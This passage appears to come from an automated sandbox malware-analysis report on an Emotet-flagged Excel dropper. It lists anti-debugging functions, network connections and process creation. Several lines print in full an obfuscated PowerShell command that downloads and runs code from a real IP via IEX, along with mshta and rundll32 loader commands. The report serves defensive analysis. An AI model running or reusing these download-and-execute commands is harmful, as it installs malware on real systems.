                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_002E4087 mov eax, dword ptr fs:[00000030h]15_2_002E4087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,9_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,9_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,9_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003ACCC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,11_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,11_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1003ACCC

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 160.16.102.168 80Jump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zzx/ccv/fe.htmlJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyStringJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyStringJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",ZiXeiVCTiyEJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",lrHfvnJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",DllRegisterServerJump to behavior
                            Source: Yara matchFile source: imedpub.com_10.xls, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\Desktop\imedpub.com_10.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,9_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,9_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,9_2_10014B71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,11_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,11_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,11_2_10014B71
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
                            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_1003906D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,9_2_1003CE1A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,9_2_100453C8

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 12.2.rundll32.exe.9c0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f90000.25.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.a20000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2b60000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2b60000.13.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.7e0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3660000.28.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2790000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.760000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.22b0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.300000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.bf0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.c20000.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.c60000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2dc0000.20.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.25c0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2410000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2730000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2790000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2850000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2730000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d80000.19.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.3d0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.300000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c60000.15.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2b90000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2760000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.24f0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2aa0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3690000.29.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2340000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f50000.24.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3660000.28.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.25c0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.9f0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f20000.23.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2aa0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d50000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2eb0000.22.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2820000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2f90000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.bc0000.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f90000.25.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.bc0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.910000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.900000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.9f0000.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c60000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.870000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.c20000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e90000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2410000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f10000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f50000.24.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.22b0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.900000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d20000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2eb0000.22.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.790000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.3d0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2ad0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.760000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.bf0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2880000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2ff0000.27.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2ad0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.21.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.cf0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2dc0000.20.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d20000.17.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2850000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.25f0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2fc0000.26.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.c60000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.bc0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.870000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2cf0000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.bc0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000002.538615152.0000000002850000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.496653771.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.494317741.0000000002F11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673473149.0000000002FC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672675374.0000000000CF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.493631688.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672831223.0000000002881000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.541336124.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.493871437.0000000000BF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673078532.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.496375881.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.541752522.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672794567.0000000002790000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672749382.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.493984139.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672982289.0000000002B91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672961471.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.494455991.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538520592.0000000000BF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673602256.0000000003660000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673105429.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538257691.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673360837.0000000002F21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673205255.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538139872.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.494009099.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673030786.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672529691.0000000000911000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672081662.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673507519.0000000002FF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.494267369.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672772312.0000000002761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538439653.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673316318.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673391096.0000000002F50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538498842.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673131902.0000000002D51000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672329422.00000000007E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.447160166.0000000000760000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.493959169.0000000002341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672931992.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.494193723.00000000025F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538417405.00000000009C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.494121481.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.541212880.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.494079905.00000000024F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538540998.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673171132.0000000002D81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672613597.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672004438.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.493846362.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538682957.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538459946.0000000000A21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
